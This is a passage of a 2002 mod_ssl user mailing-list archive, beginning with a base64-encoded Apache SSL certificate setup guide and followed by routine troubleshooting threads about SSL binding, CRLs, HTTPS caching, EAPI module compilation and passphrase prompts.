RmluYWxseSwgdG8gaW50ZWdyYXRlIHRoZSBTU0wgY2VydGlmaWNhdGVzLCB5b3Ugd2lsbCBuZWVk IHRvIGNvcHkgdGhlbSB0byANCmEgcGxhY2UgcmVhZGFibGUgYnkgeW91ciB3ZWIgc2VydmVyLiAg QXNzdW1pbmcgeW91ciB3ZWJzZXJ2ZXIgaXMgbG9jYXRlZCANCmluIC92YXIvbGliL2FwYWNoZSAo dGhlIG9sZCBTbGFja3dhcmUgc3RhbmRhcmQpLi4uDQoNCmNwIHNlcnZlci5rZXkgL3Zhci9saWIv YXBhY2hlL2NvbmYNCmNwIHNlcnZlci5jcnQgL3Zhci9saWIvYXBhY2hlL2NvbmYNCmNwIGNhLmNy dCAvdmFyL2xpYi9hcGFjaGUvY29uZg0KDQpUaGVuIGluIHlvdXIgaHR0cGQuY29uZiBmaWxlLCB5 b3Ugd2lsbCBuZWVkIHRvIGFkZCB0aGUgZm9sbG93aW5nIGxpbmVzIHRvIA0KdGhlIHNlY3Rpb24g dGhhdCBkZWZpbmVzIHlvdXIgdmlydHVhbCBTU0wgaG9zdDoNCg0KU1NMQ2VydGlmaWNhdGVGaWxl IC92YXIvbGliL2FwYWNoZS9jb25mL3NlcnZlci5jcnQNClNTTENlcnRpZmljYXRlS2V5RmlsZSAv dmFyL2xpYi9hcGFjaGUvY29uZi9zZXJ2ZXIua2V5DQoNClBsZWFzZSByZW1lbWJlciB0byB1c2Ug dGhlIGFjdHVhbCBwYXRoIHRvIHlvdXIgaHR0cGQuY29uZiBmaWxlLiAgTWFueSANCnN5c3RlbXMg dXNlIC9ldGMvYXBhY2hlIGluc3RlYWQgb2YgL3Zhci9saWIvYXBhY2hlL2NvbmYgZm9yIHRoZSBs b2NhdGlvbiANCnNvIHlvdSBtYXkgbmVlZCB0byBnbyBodW50aW5nIHRvIGZpbmQgdGhlIGh0dHBk LmNvbmYgZmlsZS4NCg0KT2YgY291cnNlLCBvbmNlIGFsbCBvZiB5b3VyIGNoYW5nZXMgYXJlIGlu IHBsYWNlLCB5b3Ugd2lsbCBuZWVkIHRvIHJlc3RhcnQgDQp0aGUgYXBhY2hlIHNlcnZlciB0byBt YWtlIHRoZSBjaGFuZ2VzIGdvIGxpdmUuDQoNCmFwYWNoZWN0bCBzdG9wDQphcGFjaGVjdGwgc3Rh cnQNCg0KSW4gbXkgZXhwZXJpZW5jZSwgb25jZSBTU0wgaXMgYWRkZWQgdG8gYW4gYXBhY2hlIHNl dHVwLCBhcGFjaGVjdGwgcmVzdGFydCANCm5vIGxvbmcgd2lsbCBmdW5jdGlvbiBjb3JyZWN0bHku ICBZb3VyIG1pbGVhZ2UgbWF5IHZhcnkuDQoNCg0KDQo0LiAgQ3JlYXRpbmcgYSBjbGllbnQgYXV0 aGVudGljYXRpb24gY2VydGlmaWNhdGUuDQoNCkEgY2xpZW50IGF1dGhlbnRpY2F0aW9uIGNlcnRp ZmljYXRlIGNhbiBiZSB1c2VkIHRvIGxpbWl0IGFjY2VzcyB0byBhIHdlYiANCnBhZ2UgYmFzZWQg b24gcG9zc2Vzc2lvbiBvZiB0aGUgY2VydGlmaWNhdGUuICBUaGlzIHdheSwgb25seSB0aG9zZSBw ZW9wbGUgDQp3aXRoIHRoZSBjZXJ0aWZpY2F0ZSB3aWxsIGJlIGFsbG93ZWQgdG8gdmlldyB0aGUg cGFnZSBpbiBxdWVzdGlvbiBhbmQgDQpldmVyeW9uZSBlbHNlIHdpbGwgb25seSBnZXQgZXJyb3Ig bWVzc2FnZXMuDQoNCkNyZWF0aW5nIHRoZSBjbGllbnQgY2VydGlmaWNhdGUgaXMgdmFyeSBzaW11 bGFyIHRvIGNyZWF0aW5nIGEgc2VydmVyIA0KY2VydGlmaWNhdGUuDQoNCmNkIC9jZXJ0cyANCm9w ZW5zc2wgZ2VucnNhIC1vdXQgaWRlbnQua2V5IDEwMjQgDQpvcGVuc3NsIHJlcSAtbmV3IC1rZXkg aWRlbnQua2V5IC1vdXQgaWRlbnQuY3NyIA0Kc2lnbi5zaCBpZGVudC5jc3INCm9wZW5zc2wgcGtj czEyIC1leHBvcnQgLWluIGlkZW50LmNydCAtaW5rZXkgaWRlbnQua2V5IC1jZXJ0ZmlsZSBjYS5r ZXkgDQotb3V0IGlkZW50LnAxMg0KDQpUaGUgbGFzdCAyIGxpbmVzIGFyZSBhY3R1YWxseSBvbmUg bG9uZyBjb21tYW5kIGxpbmUuICANCg0KVGhpcyBzaG91bGQgY3JlYXRlIHRoZSBwa2NzMTIgZm9y bWF0IGlkZW50aXR5IGNlcnRpZmljYXRlIGZpbGUgZm9yIA0KaW1wb3J0aW5nIGludG8gTW96aWxs YSBhbmQvb3IgTmV0c2NhcGUuICBZb3Ugd2lsbCBuZWVkIHRvIGRvd25sb2FkIHRoaXMgDQpmaWxl IHVzaW5nIGFuIEZUUCBwcm90b2NvbCAodXNlIGJpbiBmb3JtYXQsIHRoZSBmaWxlIGlzIG5vdCBp biBBU0NJSSkgdG8gDQp0aGUgbWFjaGluZSB3aGVyZSB5b3VyIHdlYiBicm93c2VyIGlzIGxvY2F0 ZWQuDQoNClRvIGltcG9ydCB0aGUga2V5IGludG8gTmV0c2NhcGU6ICBDbGljayBvbiB0aGUgInBh ZGxvY2siIGljb24gaW4gdGhlIGxvd2VyIA0KbGVmdCBoYW5kIGNvcm5lci4gIFVuZGVyICJDZXJ0 aWZpY2F0ZXMgLT4gWW91cnMiLCBjbGljayBvbiB0aGUgImltcG9ydCBhIA0KY2VydGlmaWNhdGUi IGJ1dHRvbiwgcG9pbnQgdGhlIGZpbGUgZGlhbG9nIHRvIHRoZSBpZGVudC5wMTIgZmlsZSB5b3Ug anVzdCANCmNyZWF0ZWQgYW5kIGRvd25sb2FkZWQsIHRoZW4gY2xpY2sgb2suICBJdCBzaG91bGQg aW1wb3J0IHRoZSBpZGVudGl0eSANCmNlcnRpZmljYXRlIHdpdGggbm8gcHJvYmxlbXMuDQoNClRv IGltcG9ydCB0aGUga2V5IGludG8gTW96aWxsYTogIENsaWNrIG9uIEVkaXQtPlByZWZlcmVuY2Vz LiAgVGhlbiBjbGljayANCm9uIFByaXZhY3kgJiBTZWN1cml0eS0+Q2VydGlmaWNhdGVzLiBDbGlj ayB0aGUgIk1hbmFnZSBDZXJ0aWZpY2F0ZXMiIA0KYnV0dG9uLiAgQ2xpY2sgb24gdGhlIFJlc3Rv cmUgYnV0dG9uIHVuZGVyICJZb3VyIENlcnRpZmljYXRlcyIuICBQb2ludCB0aGUgDQpmaWxlIGJy b3dzZXIgdG8gdGhlIGlkZW50LnAxMiBmaWxlIHlvdSBkb3dubG9hZGVkLCB0aGVuIGNsaWNrIG9r LiAgSXQgDQpzaG91bGQgaW1wb3J0IHlvdXIgaWRlbnRpdHkgY2VydGlmaWNhdGUgd2l0aCBubyBw cm9ibGVtcy4NCg0KVG8gdXRpbGl6ZSBjbGllbnQgYXV0aGVudGljYXRpb24gaW4geW91ciB3ZWIg c2VydmVyLCBwbGFjZSB0aGUgZm9sbG93aW5nIA0KZGlyZWN0aXZlcyBpbiB5b3VyIHZpcnR1YWwg c2VydmVyIGRlZmluYXRpb246DQoNClNTTFZlcmlmeUNsaWVudCByZXF1aXJlDQpTU0xWZXJpZnlE ZXB0aCAxDQpTU0xDQUNlcnRpZmljYXRlRmlsZSBjb25mL2NhLmNydA0KDQpUaGUgdHJpY2sgaGVy ZSBpcyB0aGF0IGFueSBpZGVudGl0eSBjZXJ0aWZpY2F0ZSBjYW4gYmUgdXNlZCwgc28gbG9uZyBh cyBpdCANCmlzIHNpZ25lZCBieSB0aGUgQ0EgZmlsZSB5b3Ugc3BlY2lmeS4gIEZvciBtb3JlIGlu Zm9ybWF0aW9uIG9uIGhvdyB0byANCnV0aWxpemUgY2xpZW50IGF1dGhlbnRpY2F0aW9uLCBwbGVh c2UgcmVmZXIgdG8gdGhlIGV4Y2VsbGVudCBtb2Rzc2wgaG93dG8gDQphdCBodHRwOi8vd3d3Lm1v ZHNzbC5vcmcvZG9jcy8yLjgvc3NsX2hvd3RvLmh0bWwsIGNoYXB0ZXIgNS4NCg0KUm9uIEdhZ2Ug LSBPd25lcg0KTGludXggTmV0d29yayBTZXJ2aWNlcw0KU2FnaW5hdywgTWljaGlnYW4= ---MOQ10143005772fc53a6388fc04aa1e3c089f30e636f9-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 21 15:38:20 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA25360; Thu, 21 Feb 2002 15:37:40 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from marvin-lnx.int.tele.dk id PAA25185; Thu, 21 Feb 2002 15:36:19 +0100 (MET) Received: by marvin-lnx.int.tele.dk (Postfix, from userid 500) id B66ADBD2A; Thu, 21 Feb 2002 15:36:50 +0100 (CET) Date: Thu, 21 Feb 2002 15:36:50 +0100 From: Mads Toftum To: modssl-users@modssl.org Subject: Re: SSL Problem Message-ID: <20020221143650.GA27827@marvin-lnx.int.tele.dk> Mail-Followup-To: modssl-users@modssl.org References: <20020221103624.9835.qmail@hambrosalle.dk> <20020221112113.GH25883@marvin-lnx.int.tele.dk> <20020221120217.11160.qmail@hambrosalle.dk> <20020221122942.GJ25883@marvin-lnx.int.tele.dk> <20020221132239.11885.qmail@hambrosalle.dk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020221132239.11885.qmail@hambrosalle.dk> X-Mailer: mutt Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mads Toftum X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Thu, Feb 21, 2002 at 02:22:39PM +0100, Kim L. Christensen wrote: > Now it's getting funny. Someone tried to log on from outside and that > worked out fine. > But logging on from intranet or the server itself does not work ??? > Without looking at your configuration, it is a bit difficult to guess exactly what is going on - but you probably have apache set up to bind to the external interface ... try something like: netstat -an|grep 443 vh Mads Toftum -- With a rubber duck, one's never alone. -- "The Hitchhiker's Guide to the Galaxy" ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 21 16:52:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA03908; Thu, 21 Feb 2002 16:51:27 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from hambrosalle.dk id QAA03866; Thu, 21 Feb 2002 16:51:00 +0100 (MET) Received: (qmail 3778 invoked by uid 520); 21 Feb 2002 15:46:23 -0000 Received: from kim@hambrosalle.dk by antibes by uid 523 with qmail-scanner-1.10 (uvscan: v4.1.60/v4171. . Clear:0. Processed in 0.262421 secs); 21 Feb 2002 15:46:23 -0000 Message-ID: <20020221154623.3771.qmail@hambrosalle.dk> References: <20020221103624.9835.qmail@hambrosalle.dk> <20020221112113.GH25883@marvin-lnx.int.tele.dk> <20020221120217.11160.qmail@hambrosalle.dk> <20020221122942.GJ25883@marvin-lnx.int.tele.dk> <20020221132239.11885.qmail@hambrosalle.dk> <20020221143650.GA27827@marvin-lnx.int.tele.dk> In-Reply-To: <20020221143650.GA27827@marvin-lnx.int.tele.dk> From: "Kim L. Christensen" To: modssl-users@modssl.org Subject: Re: SSL Problem Date: Thu, 21 Feb 2002 16:46:23 +0100 Mime-Version: 1.0 Content-Type: text/plain; format=flowed; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Kim L. Christensen" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Mads, I get the followin results to your suggestion: To port 80: (looks ok) antibes:~ # netstat -an|grep 80 tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN unix 2 [ ACC ] STREAM LISTENING 12809 /home/perth/interchange/etc/socket.ipc unix 3 [ ] STREAM CONNECTED 239480 To port 443: (When I am trying to connect) antibes:~ # netstat -an|grep 443 tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN tcp 0 1 192.168.1.2:33039 193.89.241.44:443 SYN_SENT Mads Toftum writes: > On Thu, Feb 21, 2002 at 02:22:39PM +0100, Kim L. Christensen wrote: >> Now it's getting funny. Someone tried to log on from outside and that >> worked out fine. >> But logging on from intranet or the server itself does not work ??? >> > > Without looking at your configuration, it is a bit difficult to guess > exactly what is going on - but you probably have apache set up to > bind to the external interface ... try something like: > > netstat -an|grep 443 > > vh > > Mads Toftum > -- > With a rubber duck, one's never alone. > -- "The Hitchhiker's Guide to the Galaxy" > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org Kim Christensen Hambros Alle 15 2900 Hellerup - DK (45) 2041 4156 http://www.hambrosalle.dk http://www.web-counting.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 21 18:36:53 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA16440; Thu, 21 Feb 2002 18:35:59 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from lackawana.kippona.com id SAA16240; Thu, 21 Feb 2002 18:34:42 +0100 (MET) Received: from localhost (chrisb@localhost [127.0.0.1]) by lackawana.kippona.com (8.12.2.Beta3/8.12.2.Beta3/Kippona) with ESMTP id g1LHYf0B005929 for ; Thu, 21 Feb 2002 12:34:41 -0500 Date: Thu, 21 Feb 2002 12:34:40 -0500 (EST) Message-Id: <20020221.123440.62345592.chrisb@kippona.com> To: modssl-users@modssl.org Subject: crl fails From: Chris Beggy X-fingerprint: 6012 F8F8 29B2 67E4 0604 BCD2 F882 88AE 8060 510A X-gpgkeyID: 0x8060510A X-Mailer: Mew version 3.0.53 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Chris Beggy X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I'm using: i586-slackware-gnu-libc apache-1.3.12 openssl-0.9.6a In testing, certs are verified, but I found the server is.not rejecting https requests from clients with revoked certificates. I have tried both the configurations: SSLCARevocationPath /www/conf/ssl.crl or SSLCARevocationFile /www/conf/ssl.crl/ca.crl When i run: openssl crl -in ca.crl -CAcert cacer.pem -text -noout I get: verify OK Certificate Revocation List (CRL): Version 1 (0x0) Signature Algorithm: md5WithRSAEncryption Issuer: /C=US/ST=xxxxxxxxxxxxxx... Last Update: Feb 21 16:59:13 2002 GMT Next Update: Mar 23 16:59:13 2002 GMT Revoked Certificates: Serial Number: 1E Revocation Date: Feb 21 15:34:12 2002 GMT Serial Number: 1F Revocation Date: Feb 8 20:52:24 2002 GMT Signature Algorithm: md5WithRSAEncryption xx.xx.xx.xx.xx.... which looks good, but maybe reflects a problem. What's my problem? How can I workaround in the meantime with .htaccess? Thanks. Chris ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 22 12:49:37 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA14797; Fri, 22 Feb 2002 12:47:22 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from d12lmsgate-3.de.ibm.com id MAA14596; Fri, 22 Feb 2002 12:45:25 +0100 (MET) Received: from d12relay01.de.ibm.com (d12relay01.de.ibm.com [9.165.215.22]) by d12lmsgate-3.de.ibm.com (1.0.0) with ESMTP id JAA39506 for ; Fri, 22 Feb 2002 09:10:40 +0100 Received: from d08ml401.at.ibm.com (d08ml401.at.ibm.com [9.244.39.57]) by d12relay01.de.ibm.com (8.11.1m3/NCO v5.01) with ESMTP id g1M8C9443538 for ; Fri, 22 Feb 2002 09:12:18 +0100 Subject: Re: R: HTTPS documents caching To: modssl-users@modssl.org X-Mailer: Lotus Notes Release 5.0.8 June 18, 2001 Message-ID: From: "Tomas Hulek" Date: Fri, 22 Feb 2002 09:09:56 +0100 X-MIMETrack: Serialize by Router on D08ML401/08/M/IBM(Release 5.0.8 |June 18, 2001) at 22/02/2002 09:16:42 MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Tomas Hulek" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Alberto, of course I did that - the trouble is that under HTTPS the browser does cache the documents, but not all of them. Tomas Hulek "Alberto Guglielmo" .com> cc: Sent by: Subject: R: HTTPS documents caching owner-modssl-users@ modssl.org 21.02.2002 10:58 Please respond to modssl-users In IE 6.0: Internet Options --> Advanced Look in the section "Security" (? I have an italian browser....) there is a checkbox about saving encrypted pages on disk. Uncheck ;) In Netscape 6.2 .... I did not find any configurable item (and I did not make any check...) Regards Alberto Guglielmo a.guglielmo@tcpsas.com Key Fingerprint:7EAF 9E34 2838 7C6B EE47 E8F0 FFC5 3CBC 90AA 5EEE PGP Keys at: http://pgpkeys.mit.edu:11371 -----Messaggio originale----- Da: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]Per conto di Tomas Hulek Inviato: giovedi 21 febbraio 2002 10.15 A: modssl-users@modssl.org Oggetto: HTTPS documents caching I have a question which concerning certain performance problems we are having with large HTTP/HTTPS documents. When our application (with extensive Java applet code) is run via HTTP, the browser caches all HTTP documents nicely (including HTML, CSS, GIF, JPG, JAR, CAB, XML ...). When the application is run next time, the browser indicates what documents it already has and the server just responds with the '304 Not Modified' message. However, when the application runs under HTTPS, documents of type JAR, CAB, XML (which we call from JavaScript on HTML pages) are not cached on the client at all. It it something that can be changed at the server level? Or is it purely a WWW browser issue (in that case - where to find exact description of the bahavior)? Thank you, Tomas Hulek ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 22 13:15:15 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id NAA17833; Fri, 22 Feb 2002 13:13:33 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from tsunami.tag.csiro.au id NAA17624; Fri, 22 Feb 2002 13:12:38 +0100 (MET) Received: from structure.tag.csiro.au (mag90.tag.csiro.au [146.118.224.90]) by tsunami.tag.csiro.au (8.9.3+Sun/8.9.1) with ESMTP id WAA20357 for ; Thu, 21 Feb 2002 22:09:47 GMT Received: (from wes@localhost) by structure.tag.csiro.au (SGI-8.9.3/8.9.3) id IAA32393 for modssl-users@modssl.org; Fri, 22 Feb 2002 08:20:48 +1000 (EST) Date: Fri, 22 Feb 2002 08:20:47 +1000 From: Wes Barris To: modssl list Subject: How to install mod_ssl + mod_webapp? Message-ID: <20020222082047.A132390@structure> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0us Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Wes Barris X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users We are currently using Jakarta-tomcat-4.0.1 with Apache httpd 1.3.22 (binary distributions for linux downloaded from the www.apache.org website). I also have mod_webapp installed (downloaded from the same website). Now, I want to add mod_ssl functionality to this mix. From what I gather from the www.modssl.org website, I must throw away what I have and compile from sources in order to use mod_ssl. I followed the instructions on this page: http://www.modssl.org/example/ and everything seemed to build properly. After copying mod_ssl.so to the new ./libexec directory and adding the following two lines to ./conf/httpd.conf: LoadModule webapp_module libexec/mod_webapp.so AddModule mod_webapp.c I get this error message: root@redhat# /usr/local/apache-ssl/bin/apachectl configtest [Wed Feb 20 15:59:04 2002] [warn] Loaded DSO libexec/mod_webapp.so uses plain Apache 1.3 API, this module might crash under EAPI! (please recompile it with -DEAPI) [Wed Feb 20 15:59:04 2002] [warn] module mod_webapp.c is already added, skipping Syntax OK I can read the words but I don't really know what to do. It seems to be saying that I have to compile mod_webapp using -DEAPI. Can anyone provide some guidance? -- Wes Barris E-Mail: Wes.Barris@csiro.au Phone: 07-3346-2504 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 22 14:05:32 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA22944; Fri, 22 Feb 2002 14:03:32 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id OAA22905; Fri, 22 Feb 2002 14:02:55 +0100 (MET) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id OAA20024 for ; Fri, 22 Feb 2002 14:02:48 +0100 (MET) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma020000; Fri, 22 Feb 02 14:02:45 +0100 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id OAA04737 for ; Fri, 22 Feb 2002 14:02:44 +0100 (MET) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id OAA17686 for ; Fri, 22 Feb 2002 14:02:42 +0100 (MET) Message-ID: <3C764172.4CB8912E@bourse.ch> Date: Fri, 22 Feb 2002 14:02:42 +0100 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: How to install mod_ssl + mod_webapp? References: <20020222082047.A132390@structure> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Wes Barris wrote: > > We are currently using Jakarta-tomcat-4.0.1 with Apache httpd 1.3.22 > (binary distributions for linux downloaded from the www.apache.org > website). I also have mod_webapp installed (downloaded from the > same website). > > Now, I want to add mod_ssl functionality to this mix. From what I > gather from the www.modssl.org website, I must throw away what I > have and compile from sources in order to use mod_ssl. > > I followed the instructions on this page: > > http://www.modssl.org/example/ > > and everything seemed to build properly. After copying mod_ssl.so to > the new ./libexec directory and adding the following two lines to > ./conf/httpd.conf: > > LoadModule webapp_module libexec/mod_webapp.so > AddModule mod_webapp.c > > I get this error message: > > root@redhat# /usr/local/apache-ssl/bin/apachectl configtest > [Wed Feb 20 15:59:04 2002] [warn] Loaded DSO libexec/mod_webapp.so uses plain Apache 1.3 API, this module might crash under EAPI! (please recompile it with -DEAPI) > [Wed Feb 20 15:59:04 2002] [warn] module mod_webapp.c is already added, skipping > Syntax OK > > I can read the words but I don't really know what to do. It seems > to be saying that I have to compile mod_webapp using -DEAPI. Can > anyone provide some guidance? G'day, I think you've got most of it yourself... The standard apache API needs to be extended to allow the inclusion of mod_ssl, that is why you have to compile apache with extended API (EAPI) if you want to load or compile in mod_ssl. It seems that mod_webapp (don't know it personally) does indeed need to be re-compiled using -DEAPI if you are going to load it into a EAPI apache. Rgds, owen Boyle. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 22 14:49:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA26765; Fri, 22 Feb 2002 14:48:18 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from morzine.ciger.be id OAA26701; Fri, 22 Feb 2002 14:47:16 +0100 (MET) Received: from meribel.cigersoft.be (meribel.cigersoft.be [172.24.2.233]) by morzine.ciger.be (8.12.2/8.12.2) with ESMTP id g1MDl3U6053511 for ; Fri, 22 Feb 2002 14:47:04 +0100 (CET) content-class: urn:content-classes:message Subject: Apache/2.0.32 (Win32) mod_ssl/3.0a0 OpenSSL/0.9.6c - passphrase problem Date: Fri, 22 Feb 2002 14:46:57 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Message-ID: <43101D2B73D34E449831D5F1BC57F2C322B128@meribel.cigersoft.be> X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3 Thread-Topic: Apache/2.0.32 (Win32) mod_ssl/3.0a0 OpenSSL/0.9.6c - passphrase problem Thread-Index: AcG7p0IWWPY1eoZgR8WNPYX9nUqDNg== From: "Henri Hennebert" To: X-Virus-Scanned: by AMaViS-perl11-milter (http://amavis.org/) Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id OAA26760 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Henri Hennebert" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello everyone I encounter a problem with the passphrase in mod_ssl on WinXP. If I use the builtin passphrase dialog: SSLPassPhraseDialog buildin When I start apache2 from a cmd box: Apache -DSSL start I'm prompted for the passphrase when the first process start. When the second process start, the prompt don't come and the process start an infinite loop asking somewhere for the passphrase. I change from builtin to exec: SSLPassPhraseDialog exec:/workbench/apache2/bin/passphrase.exe And all run smoothly. Henri ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 22 15:13:29 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA28582; Fri, 22 Feb 2002 15:06:44 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id PAA28099; Fri, 22 Feb 2002 15:01:38 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 4EBED4CE75B; Fri, 22 Feb 2002 15:01:33 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g1MD7Vi32158; Fri, 22 Feb 2002 14:07:31 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from tsunami.tag.csiro.au id HAA19601; Wed, 20 Feb 2002 07:05:35 +0100 (MET) Received: from structure.tag.csiro.au (mag90.tag.csiro.au [146.118.224.90]) by tsunami.tag.csiro.au (8.9.3+Sun/8.9.1) with ESMTP id FAA06410 for ; Wed, 20 Feb 2002 05:54:16 GMT Received: (from wes@localhost) by structure.tag.csiro.au (SGI-8.9.3/8.9.3) id QAA45052 for modssl-users@modssl.org; Wed, 20 Feb 2002 16:05:16 +1000 (EST) Date: Wed, 20 Feb 2002 16:05:16 +1000 From: Wes Barris To: modssl-users@modssl.org Subject: mod_ssl and mod_webapp? Message-ID: <20020220160515.A44946@structure> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0us Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Wes Barris X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Can mod_ssl be used with mod_webapp? I have apache httpd 1.3.22, jakarta tomcat 4.0.1, and mod_webapp working on a couple systems (redhat and solaris). I want to add mod_ssl to this mix. I gather from the information on www.modssl.org that the only way to gain ssl support in apache httpd is to build both mod_ssl and apache from sources. After building according to the instructions at www.modssl.org, I get this error when testing the httpd.conf file: root@redhat# /usr/local/apache-ssl/bin/apachectl configtest [Wed Feb 20 15:59:04 2002] [warn] Loaded DSO libexec/mod_webapp.so uses plain Apache 1.3 API, this module might crash under EAPI! (please recompile it with -DEAPI) [Wed Feb 20 15:59:04 2002] [warn] module mod_webapp.c is already added, skipping Syntax OK Is this something that needs to be fixed? Am I doing something wrong to get this error? -- Wes Barris E-Mail: Wes.Barris@csiro.au Phone: 07-3346-2504 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Feb 22 15:13:46 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA28605; Fri, 22 Feb 2002 15:07:06 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id PAA28083; Fri, 22 Feb 2002 15:01:34 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 84A3C4CE674; Fri, 22 Feb 2002 15:01:32 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g1MD4Ob32089; Fri, 22 Feb 2002 14:04:24 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from piffio.homelinux.org id SAA21501; Mon, 18 Feb 2002 18:39:48 +0100 (MET) Received: (from piffio@localhost) by 